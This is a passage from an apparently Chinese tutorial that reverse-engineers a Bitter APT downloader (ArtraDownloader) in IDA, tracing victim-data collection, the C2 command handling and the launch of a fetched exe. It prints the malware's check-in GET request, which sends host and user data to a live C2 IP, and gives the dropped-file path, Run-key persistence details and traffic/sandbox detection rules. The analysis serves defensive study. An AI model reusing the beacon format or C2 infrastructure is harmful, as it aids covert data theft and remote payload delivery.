通信後的if判斷處修改跳轉。不跳就結束嘞(“Tab”鍵查看流程圖或者在“Graph overview”中可以看出,如果不跳就跳過大段代碼結束了):","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/8a/8a793b41f618f0cd6d97e2a822a29364.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將光標定位到“if”判斷connect返回的結果處,按“Tab”鍵查看IDA的反彙編窗口,可以看到“if”的關鍵地址是“0x403678”,下斷運行到此處後修改ZF標誌位,讓其不跳轉即可:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/77/7740f3f5b1fd043bc652d35c69abcc6f.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"數據及其來源","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"套接字連接成功後的第一個函數402F40裏調用了系統API“GetComputerNameA”,查看其保存獲取到數據ComputerName在何處被引用,發現函數402F40末尾有大量調用同一函數40C318和同一內存地址0x435598。在“GetComputerNameA”和函數40C318間,這部分代碼中有“GetUserNameA”、“RegQueryValueExA”、和“GetSystemInfo”等獲取信息的函數後,推測函數402F40爲計算機信息的字符串拼接:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/59/598c25052a2bd9b6230d92ad88abac1e.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"有了這個推測後,在最後一次調用40C318處下斷,數據窗口監視對應的首參內存地址“0x435598”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d5/d58a0b2de2683595fe1bbd08c49bd8c1.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"確實拼接出帶有計算機信息的字符串“?a=HostName&b=COMPUTERNAME&c=Windows%207%20Professional&d=AdministratorAdministratorf9117a5d-b155-4a3e-b6c9-5ae181247d3b165536040965860”,可以分解爲以下的格式:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"a = [HostName] b = [ComputerName] c = [電腦系統信息] d = [UserName][GUID]","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"其中d值比較奇怪,使用交叉引用查看該寫入值的調用,可以發現其值爲UserName和調用“RegQueryValueExA”獲取的GUID:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/eb/ebd718b0e5d8542e2f834892ad3f8f1e.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"以懶人思維來說,定位這類數據來源的步驟是可以省略的,僅需","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"將計算機信息(如計算機名,用戶名,MAC地址、IP地址、GUID、甚至是偏門如C盤卷序列號的數據)修改或記錄其數據即可。","attrs":{}},{"type":"text","text":"上面圖中顯示的調試環境的計算機就是如此,一般分析了這麼多樣本,看到自己的GUID數據也能認出來,只是爲了演示一下如何交叉引用定位。或記住GUID格式爲“xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”(8-4-4-4-12)。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"所以d值的數據爲[UserName][UserName][GUID][dwActiveProcessorMask][dwAllocationGranularity][dwOemId][dwPageSize][dwProcessorType][wProcessorArchitecture],現在又可以把[dwActiveProcessorMask][dwAllocationGranularity][dwOemId][dwPageSize][dwProcessorType][wProcessorArchitecture]數據記到小本本里了~","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"數據使用","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將IDA中該儲存計算機數據的內存地址重命名後,查看該內存地址的交叉引用可以發現被多個函數調用,而最後一個調用的函數401080,該函數的首參(通常是比較重要的參數)後續成爲了“Send”函數參數中要發送的數據緩衝區,此處可以推測401080函數爲拼接待發送數據:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/82/825064e126c1d9b2d2fc3772caf1f979.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"跳轉到調用401080處,可以明顯看到是構建GET方法的HTTP報文數據。其實不用跳轉,通過傳參的數量/格式和前後調用的函數其實也可以推測出這段代碼是構建HTTP報文:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/08/0893a80fcd7e1897ea81f61c2b873ae6.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"Send發送上線包","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"查看“Send”函數的要發送的數據緩衝區(第二個參數地址),可以看到拼接好要發送的數據:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/04/0477220c30cb0e27b3e4d0826555857c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"木馬程序發送的第一個包還帶有計算機信息的,通常可以叫做上線包:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"GET ///RguhsT/accept.php?a=HostName&b=COMPUTERNAME&c=Windows%207%20Professional&d=AdministratorAdministratorf9117a5d-b155-4a3e-b6c9-5ae181247d3b165536040965860&e=efgh HTTP/1.1 Host: 162.0.229.203","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"此處可以發現有比較明顯的流量特徵,家裏有沙箱/流量檢測設備的同學可以設置爲流量檢測規則:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"特徵:http_url=?a=*b=*c=*e= URL編碼後:http_url=a%3d*b%3d*c%3d*d%3d 加上GET方法爲:http_url=a%3d*b%3d*c%3d*d%3d&http_method=GET","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"這個規則的誤報率估計不低,給c值加上“Windows”可以降低一些誤報率","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"http_url=a%3d*b%3d*c%3dWindows*d%3d&http_method=GET","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"如果家裏有條件的同學,可以以安全研究/APT追蹤發現的角度設置該流量規則,然後再過一遍沙箱規則或YARA規則;如果是部署到客戶現場的流量檢測設備,則不建議部署。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"沙箱如果像我的調試環境一樣用戶名電腦名主機名是固定字符串的話,再寫死對其他值的判斷,基本就沒有誤報了。除非這個上線包來自開源項目,被很多惡意軟件使用,那就需要增加其他判斷條件,此步在下文的“通過VT擴線”中有詳述。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"Recv接受返回數據","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"一般“Send”發送上線包後就是“Recv”從遠程服務器接受命令或文件,查看“Recv”從遠程服務器獲取的數據有什麼交叉引用,發現函數408550明顯有C2指令判斷:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/9f/9f7112123873b9f904484f51ff59dd9d.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"有部分內存數據爲運行後才被解密的字符串,可以在上述的字符串解密操作後,在IDA裏將對應的內存地址重命名,或者在動態運行時已經是解密後的數據。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"爲了進入預定義C2指令的邏輯,可以在“Recv”執行後將函數408550的第二個參數手動修改爲“Yes file”,或者修改字符串對比判斷後的跳轉也行,具體看後續執行的代碼,本樣本直接修改跳轉更方便:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d7/d7cd2cf8ceb28b2e1f589ea3908d176a.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"一般接收C2指令後的判斷處建議做個快照,看看跳不跳轉分別執行了哪些功能。如當有多個C2指令進入不同的邏輯分支執行不同的代碼時,分析完其中一個跳轉後可以恢復快照,通過修改跳轉或下一跳地址(EIP)無縫銜接分析下一個分支邏輯。該樣本如果不滿足“Yes file”指令後的代碼邏輯就是退出,此處不做展示。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"進入“Yes file”的代碼邏輯後,可以明顯看到有大量對接收數據的操作,如提取數據的代碼:if判斷長度+DoWhile循環中嵌套一個if判斷數據,最後memmove保存:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/a3/a3574c11f2a4533f5f4cc79d6eec0a16.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於數據不方便公開及教學意義,此處按照無法獲取數據的情況進行接下來的分析。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"對接受的數據結合上下文代碼進行推測:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"1.一般來說,對數據進行各種提取/解密/判斷後的最後一個內存塊地址0x4351F7可以優先分析。發現最後被操作的內存塊在後續代碼中被函數40EB61多次調用;","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"2.函數40EB61最後一次調用的首參,同時也是字符串拼接函數“strcat”的首參,而拼接的另一個字符串爲解密後的字符串“.exe”;","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"3.那麼可以推測該文件爲一個exe文件,查看其交叉引用,發現是執行程序的函數“ShellExecuteA”的參數,並且執行動作的參數爲“open”——也就是運行了一個EXE文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/84/848067728e4d545042cf95cdddb009a1.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"而在調試器運行到“ShellExecuteA”之前,中間大部分的函數爲對文件的一些操作,可能會觸發一系列文件操作函數,這一步調試分析的意義不是很大。從遠程服務器獲取數據到本地執行的這個過程,或許有文件解密操作,通過逆出解密算法,可以還原出PE文件的加密數據(或者從流量裏Dump),寫出下載加密PE文件的流量規則。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"至此,該樣本的功能已經很清晰了,下載器運行後會收集受害機器的信息拼接爲字符串,構建上線包發送給遠程服務器,從遠程服務器獲取exe文件的數據並運行。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"這種有外連下載exe運行操作的惡意文件通常歸類爲下載器(Downloader/Loader),APT組織蔓靈花常使用下載器在受害機器上安裝其他的惡意功能插件,如鍵盤記錄器、文件記錄器或者遠控木馬。一般這些文件存放在下載器發送上線包的遠程服務器下,此時通過VT搜索IP或者域名,查看其關聯文件,可能會有收穫。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"通過VT擴線","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"搜索遠程服務器IP“162.0.229.203”,在“Relations”,可以看到多個域名,部分字符串“pop3”、“webmail”、“mail”和郵件服務相關,符合釣魚郵件攻擊的信息:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/9f/9f077be889325bcd4316a77c42c9a4e6.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"“Communicating Files”下也有多個關聯文件,通過時間可以發現來自多個攻擊活動:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/87/879c5063b89f1ddd12f1099130af783b.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"點開關聯文件中其他攻擊活動的樣本的“Behavior”,可以發現有兩個比較固定的信息。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"1.GET請求的URL:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/16/161be4dea41be09b137b55ff4e3a0e09.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"2.釋放文件到“C:\\intel\\logs\\dlhost.exe”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/a1/a1320e0a097798186a72778aac4067ae.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"通過上面兩個信息,寫沙箱規則可以比較準確地抓到","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"初始攻擊","attrs":{}},{"type":"text","text":"載荷:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"Files Dropped = C:\\\\intel\\\\logs\\\\dlhost.exe HTTP Requests = http_url=a%3d*b%3d*c%3dWindows*d%3d&http_method=GET","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在IP的“Details”頁面可以看到其“Google Results”中,有關聯到蔓靈花歷史攻擊活動的報告,以及在線沙箱跑出的帶有該IP的報告:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/72/725128c313104003325f870013a5c853.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"從以往攻擊活動的在線沙箱報告中可以看到其他插件的信息,如在%TEMP%路徑下釋放文件“rgdl.exe”,該文件有PDB信息“D:\\C++\\Reg_Entry\\reg_en\\Release\\reg_en.pdb”,在蔓靈花早期的攻擊中曾名爲“regdl”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d3/d3095296ee017d6f0b0fa6559dca967a.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"“rgdl.exe”是一個註冊表操作器,將“audiodq.exe”路徑寫入註冊表的Run項,用於建立惡意可執行程序(“audiodq.exe”)的開機自啓動:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/ed/ed268d4161e8ed0e3377d0eac8df8f4e.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"上述兩個exe都是可以通過在線網站擴線到的蔓靈花常用的插件。再搜索這兩個字符串進行擴線,可以找到更多的歷史攻擊載荷、開源情報、甚至更完整的攻擊活動報告。從開源情報中發現該下載器被命名爲“ArtraDownloader”,源自2019年Palo Alto Networks公開發布的報告:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/b6/b6ad1853d8b7d274e8b7c62c9c5b5fa7.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"利用收集到的信息,組合搜索到以往歷史攻擊活動,發現多個本次活動未出現的插件,如鍵盤記錄器“Igfxsrvk.exe”,信息收集器“Lsap.exe”,遠控木馬“MSAServices”和“MSAServicet”等。雖然與本次攻擊活動的樣本無強關聯的關係,一般來說都是這幾個搭配着使用,可以作爲日常積累進行分析記錄。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"分析APT組織常用的TTPs(攻擊手法),將完整的攻擊鏈分解爲多個階段,將多次攻擊活動的樣本名稱、MD5、功能都記錄保存之後,以文件名、PDB信息、C2指令,沙箱行爲等信息進行組合,寫出多角度多層級的檢測規則。在理論理想(重音)的信息複利下,可以更好地發現、預警APT攻擊活動,